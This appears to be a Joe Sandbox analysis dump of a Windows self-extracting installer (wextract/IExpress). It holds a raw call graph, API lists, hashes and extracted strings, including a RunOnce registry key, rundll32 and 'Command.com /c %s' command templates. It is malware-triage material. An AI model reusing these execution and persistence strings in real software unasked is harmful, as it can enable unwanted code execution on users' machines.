2985->2988 2987 7ff71d1d583d SetFilePointer 2986->2987 2986->2988 2987->2988 2989 7ff71d1d8417 2990 7ff71d1d8426 _exit 2989->2990 2991 7ff71d1d842f 2989->2991 2990->2991 2992 7ff71d1d8444 2991->2992 2993 7ff71d1d8438 _cexit 2991->2993 2993->2992 2999 7ff71d1d8b30 _XcptFilter 3000 7ff71d1d81b0 __getmainargs 2915 7ff71d1d58b0 2916 7ff71d1d5904 2915->2916 2917 7ff71d1d58ee 2915->2917 2920 7ff71d1d5a29 2916->2920 2922 7ff71d1d58fc 2916->2922 2925 7ff71d1d591a 2916->2925 2918 7ff71d1d5770 CloseHandle 2917->2918 2917->2922 2918->2922 2919 7ff71d1d8470 7 API calls 2921 7ff71d1d5af4 2919->2921 2923 7ff71d1d5a35 SetDlgItemTextA 2920->2923 2924 7ff71d1d5a4a 2920->2924 2922->2919 2923->2924 2924->2922 2940 7ff71d1d51bc GetFileAttributesA 2924->2940 2925->2922 2926 7ff71d1d5982 DosDateTimeToFileTime 2925->2926 2926->2922 2928 7ff71d1d59a3 LocalFileTimeToFileTime 2926->2928 2928->2922 2930 7ff71d1d59c1 SetFileTime 2928->2930 2930->2922 2931 7ff71d1d59e9 2930->2931 2933 7ff71d1d5770 CloseHandle 2931->2933 2932 7ff71d1d5380 29 API calls 2934 7ff71d1d5ab5 2932->2934 2935 7ff71d1d59f2 SetFileAttributesA 2933->2935 2934->2922 2936 7ff71d1d5ac1 2934->2936 2935->2922 2947 7ff71d1d527c LocalAlloc 2936->2947 2939 7ff71d1d5acb 2939->2922 2941 7ff71d1d525f 2940->2941 2942 7ff71d1d51de 2940->2942 2941->2922 2941->2932 2942->2941 2943 7ff71d1d5246 SetFileAttributesA 2942->2943 2944 7ff71d1d7ac8 28 API calls 2942->2944 2943->2941 2945 7ff71d1d5228 2944->2945 2945->2941 2945->2943 2946 7ff71d1d523c 2945->2946 2946->2943 2948 7ff71d1d52aa 2947->2948 2950 7ff71d1d52d4 2947->2950 2949 7ff71d1d4dcc 24 API calls 2948->2949 2951 7ff71d1d52cd 2949->2951 2950->2950 2952 7ff71d1d52e4 LocalAlloc 2950->2952 2951->2939 2952->2951 2953 7ff71d1d5300 2952->2953 2954 7ff71d1d4dcc 24 API calls 2953->2954 2955 7ff71d1d5323 LocalFree 2954->2955 2955->2951 3032 7ff71d1d4a30 3033 7ff71d1d4a50 3032->3033 3034 7ff71d1d4a39 SendMessageA 3032->3034 3034->3033 3035 7ff71d1d3530 3036 7ff71d1d3802 EndDialog 3035->3036 
3037 7ff71d1d3557 3035->3037 3040 7ff71d1d356b 3036->3040 3038 7ff71d1d377e GetDesktopWindow 3037->3038 3039 7ff71d1d3567 3037->3039 3041 7ff71d1d4c68 14 API calls 3038->3041 3039->3040 3043 7ff71d1d3635 GetDlgItemTextA 3039->3043 3044 7ff71d1d357b 3039->3044 3042 7ff71d1d3795 SetWindowTextA SendDlgItemMessageA 3041->3042 3042->3040 3045 7ff71d1d37d8 GetDlgItem EnableWindow 3042->3045 3053 7ff71d1d365e 3043->3053 3069 7ff71d1d36e9 3043->3069 3046 7ff71d1d3584 3044->3046 3047 7ff71d1d3618 EndDialog 3044->3047 3045->3040 3046->3040 3048 7ff71d1d3591 LoadStringA 3046->3048 3047->3040 3049 7ff71d1d35bd 3048->3049 3050 7ff71d1d35de 3048->3050 3054 7ff71d1d4dcc 24 API calls 3049->3054 3072 7ff71d1d4a60 LoadLibraryA 3050->3072 3052 7ff71d1d4dcc 24 API calls 3052->3040 3056 7ff71d1d3694 GetFileAttributesA 3053->3056 3053->3069 3071 7ff71d1d35d7 3054->3071 3057 7ff71d1d36a8 3056->3057 3058 7ff71d1d36fa 3056->3058 3060 7ff71d1d4dcc 24 API calls 3057->3060 3062 7ff71d1d7ba8 CharPrevA 3058->3062 3059 7ff71d1d35eb SetDlgItemTextA 3059->3040 3059->3049 3063 7ff71d1d36cb 3060->3063 3061 7ff71d1d374b EndDialog 3061->3040 3064 7ff71d1d370e 3062->3064 3063->3040 3065 7ff71d1d36d4 CreateDirectoryA 3063->3065 3066 7ff71d1d6b70 31 API calls 3064->3066 3065->3058 3065->3069 3067 7ff71d1d3716 3066->3067 3068 7ff71d1d3721 3067->3068 3067->3069 3070 7ff71d1d6ca4 38 API calls 3068->3070 3068->3071 3069->3052 3070->3071 3071->3040 3071->3061 3073 7ff71d1d4c20 3072->3073 3074 7ff71d1d4aa0 GetProcAddress 3072->3074 3078 7ff71d1d4dcc 24 API calls 3073->3078 3075 7ff71d1d4ac2 GetProcAddress 3074->3075 3076 7ff71d1d4c0a FreeLibrary 3074->3076 3075->3076 3077 7ff71d1d4ae2 GetProcAddress 3075->3077 3076->3073 3077->3076 3079 7ff71d1d4b04 3077->3079 3080 7ff71d1d35e3 3078->3080 3081 7ff71d1d4b13 GetTempPathA 3079->3081 3082 7ff71d1d4b65 3079->3082 3080->3040 3080->3059 3083 7ff71d1d4b2b 3081->3083 3086 7ff71d1d4bee FreeLibrary 3082->3086 3083->3083 3084 7ff71d1d4b34 CharPrevA 3083->3084 3084->3082 
3085 7ff71d1d4b4e CharPrevA 3084->3085 3085->3082 3086->3080 3087 7ff71d1d78b0 3088 7ff71d1d78fd 3087->3088 3089 7ff71d1d7ba8 CharPrevA 3088->3089 3090 7ff71d1d7935 CreateFileA 3089->3090 3091 7ff71d1d7970 3090->3091 3092 7ff71d1d797e WriteFile 3090->3092 3095 7ff71d1d8470 7 API calls 3091->3095 3093 7ff71d1d79a2 CloseHandle 3092->3093 3093->3091 3096 7ff71d1d79d5 3095->3096 3097 7ff71d1d5870 GlobalAlloc 3098 7ff71d1d33f0 3099 7ff71d1d34ec 3098->3099 3102 7ff71d1d3402 3098->3102 3100 7ff71d1d34f5 SendDlgItemMessageA 3099->3100 3101 7ff71d1d34e5 3099->3101 3100->3101 3103 7ff71d1d340f 3102->3103 3104 7ff71d1d3441 GetDesktopWindow 3102->3104 3103->3101 3105 7ff71d1d3430 EndDialog 3103->3105 3106 7ff71d1d4c68 14 API calls 3104->3106 3105->3101 3107 7ff71d1d3458 6 API calls 3106->3107 3107->3101

                                Callgraph

                                • Executed
                                • Not Executed
                                • Opacity -> Relevance
                                • Disassembly available

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$horseradish$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                • API String ID: 2679723528-2543813906
                                • Opcode ID: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                • Instruction ID: 395df5a64739b71c06a614f803766e84c8a3f589c326cb0c09f4998bc742e069
                                • Opcode Fuzzy Hash: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                • Instruction Fuzzy Hash: D9026071A4CE4386FB20AB14B8681B9B7A1FB89764FD60135DA4D42654EF3CE54CEF20

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                • API String ID: 178549006-607953301
                                • Opcode ID: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                • Instruction ID: 1263b7ca9c8a707597055ad4ed96d482636eb67696dca2df7b44c66bfe46e3b3
                                • Opcode Fuzzy Hash: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                • Instruction Fuzzy Hash: 51815E72A0CE4296FB10AB11F8682B9F7A2FB89B64F865231D94D43754EF3CD149DB10

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                • API String ID: 383838535-3614570713
                                • Opcode ID: ffd31459a5765e8bb283d5931304b093724e680e9c960acfeea798f9c59d150d
                                • Instruction ID: d90fb71e3b1683e03503dd821619f5523b2b58e5387fd7249959590ea17780a5
                                • Opcode Fuzzy Hash: ffd31459a5765e8bb283d5931304b093724e680e9c960acfeea798f9c59d150d
                                • Instruction Fuzzy Hash: A5E1AF62A0CE8385FB11AF10B4282BAA7A2EB45764FD54231DA4D03795EF3DD58DDB20

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                • API String ID: 3973824516-1370313076
                                • Opcode ID: aa749724514e17a92a0630b937cbe188b5289099f860de4be6e22ad4012e2d81
                                • Instruction ID: 28e61e40518e2d20314203c36ef9542195792042bca677ec788002d34e3c9fec
                                • Opcode Fuzzy Hash: aa749724514e17a92a0630b937cbe188b5289099f860de4be6e22ad4012e2d81
                                • Instruction Fuzzy Hash: E4D1A32261CE8786FB10AB10B4682BAE7A1FB85760FD24535DA4D43695EF3DE40DDF20

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                • String ID: $EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$horseradish
                                • API String ID: 3100096412-2384002766
                                • Opcode ID: 7fc7f578be530f482524e13d1538833715e790512501b6b919f004c900bcfea5
                                • Instruction ID: 3d2c49273aed820f959799de504a1fa16d94a0b146b53e8a7ba97ac094f0273a
                                • Opcode Fuzzy Hash: 7fc7f578be530f482524e13d1538833715e790512501b6b919f004c900bcfea5
                                • Instruction Fuzzy Hash: 11819D31A0CE4386F720BB54B8683BAA691AF89774FD24135D90D42695EF7CE40DEF20

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                • API String ID: 4237285672-388467436
                                • Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                • Instruction ID: 97849acd4b436c66f5ceaaec74a9103179d9ad163704bfca5dab7a4e56e7d272
                                • Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                • Instruction Fuzzy Hash: B1A15036A0CF428AF720AB24F4686AABBA5FB89754F854535DA4D03654EF3CD409DF10

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                • String ID: *MEMCAB$CABINET
                                • API String ID: 1305606123-2642027498
                                • Opcode ID: 73d02511bd41989529bcd23ff6b0e0c8ec250e42df1f9c8d155ed0afd688ad53
                                • Instruction ID: 609d2b76187aef182e57d439d8a18d6e086fc1b7b9604161e78c2c5a2db6ccc9
                                • Opcode Fuzzy Hash: 73d02511bd41989529bcd23ff6b0e0c8ec250e42df1f9c8d155ed0afd688ad53
                                • Instruction Fuzzy Hash: 9F51DB31A0CF4386FB10AB10F8686B5E7A2FB8A765FD64135D94D46654EF7CE008EE60

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                • API String ID: 3010855178-2712585282
                                • Opcode ID: d024e3d04dc16d6ff208cbe559824f9b5939ede8501c72ce14a45a05cbc0e3f3
                                • Instruction ID: 2423fbae9fd900dfc7a51d9e78c8354a19ae3c89690100f74f79d3688ef80123
                                • Opcode Fuzzy Hash: d024e3d04dc16d6ff208cbe559824f9b5939ede8501c72ce14a45a05cbc0e3f3
                                • Instruction Fuzzy Hash: 4E715C30E0CE4386FA60BB15B968275E6A5AF85760FC24135D94D42295FF6CE40CEE60

                                Control-flow Graph

                                APIs
                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF71D1D2CE1), ref: 00007FF71D1D657C
                                • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF71D1D2CE1), ref: 00007FF71D1D662F
                                • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF71D1D2CE1), ref: 00007FF71D1D666F
                                  • Part of subcall function 00007FF71D1D63B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF71D1D2CE1), ref: 00007FF71D1D6423
                                  • Part of subcall function 00007FF71D1D63B8: GetFileAttributesA.KERNELBASE ref: 00007FF71D1D6432
                                  • Part of subcall function 00007FF71D1D63B8: GetTempFileNameA.KERNEL32 ref: 00007FF71D1D645B
                                  • Part of subcall function 00007FF71D1D63B8: DeleteFileA.KERNEL32 ref: 00007FF71D1D6473
                                  • Part of subcall function 00007FF71D1D63B8: CreateDirectoryA.KERNEL32 ref: 00007FF71D1D6484
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                • API String ID: 1979080616-1143122538
                                • Opcode ID: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                • Instruction ID: e1cd51a3b05a5c51df1afeaf70c64f3cedcfb38873b78776de6e2e1466c35ff5
                                • Opcode Fuzzy Hash: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                • Instruction Fuzzy Hash: 25519861A0CF4781FA14AB15B8382B5E3A1AF457A0FDA4935C94D03295FF7CE40CEE60

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                • String ID:
                                • API String ID: 3183975587-3916222277
                                • Opcode ID: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                • Instruction ID: 738bc73172cc57d06d8c35dde21fdac4ca285548e62d4ebe1814f42352caea4e
                                • Opcode Fuzzy Hash: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                • Instruction Fuzzy Hash: F7515E32A4CE8286F760AB54F4683B9F7A1FB887A4F924235D54D426A4EF7CD448DF10

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                • String ID: @$HeapSetInformation$Kernel32.dll
                                • API String ID: 1302179841-1204263913
                                • Opcode ID: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                • Instruction ID: b0414d7944eebc74fba3bd04921e26cdcc8d93fd5cbfcd4c459727de5425ddef
                                • Opcode Fuzzy Hash: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                • Instruction Fuzzy Hash: BD313231A0DE4386FB60BB20B4A82B5F6A1AF59770FD64135D91D03295FF7CE448AE60
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                • String ID:
                                • API String ID: 836429354-0
                                • Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                • Instruction ID: 425210e76a3001867562a1dcee13d6322d506e038d13d003229b5ef678848644
                                • Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                • Instruction Fuzzy Hash: 57519F7160CE8295FB11AF20E8682E9B7A2FB45BA4FC58171DA1E03695EF3CD50DDB10

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                • API String ID: 3049360512-2186971993
                                • Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                • Instruction ID: 4684f2ae3c2e284e1d64896915836883d71d2e087a82c77e401ea0c270f3e3e5
                                • Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                • Instruction Fuzzy Hash: 02513E21A0CE8796FB10AB14F8683B9B7A1FB59764FC64531D94D02694EF3CE40CEB20

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: OpenQuery$CloseInfoValue
                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                • API String ID: 2209512893-559176071
                                • Opcode ID: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                • Instruction ID: 83d866850f3ee40433abd26d6c595382caa989277d9d8fb79f90c13f72ef9136
                                • Opcode Fuzzy Hash: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                • Instruction Fuzzy Hash: 3B31AE32A0CF42CAE7109F20F8A46A9F7A5FB89764F854534EA9D03B54EF38D058DB10

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                • String ID: IXP$IXP%03d.TMP
                                • API String ID: 1082909758-3932986939
                                • Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                • Instruction ID: 86fba61756f424a6c2873bb1a7471b3538f4d3fab453b620ee575ce957dfc02c
                                • Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
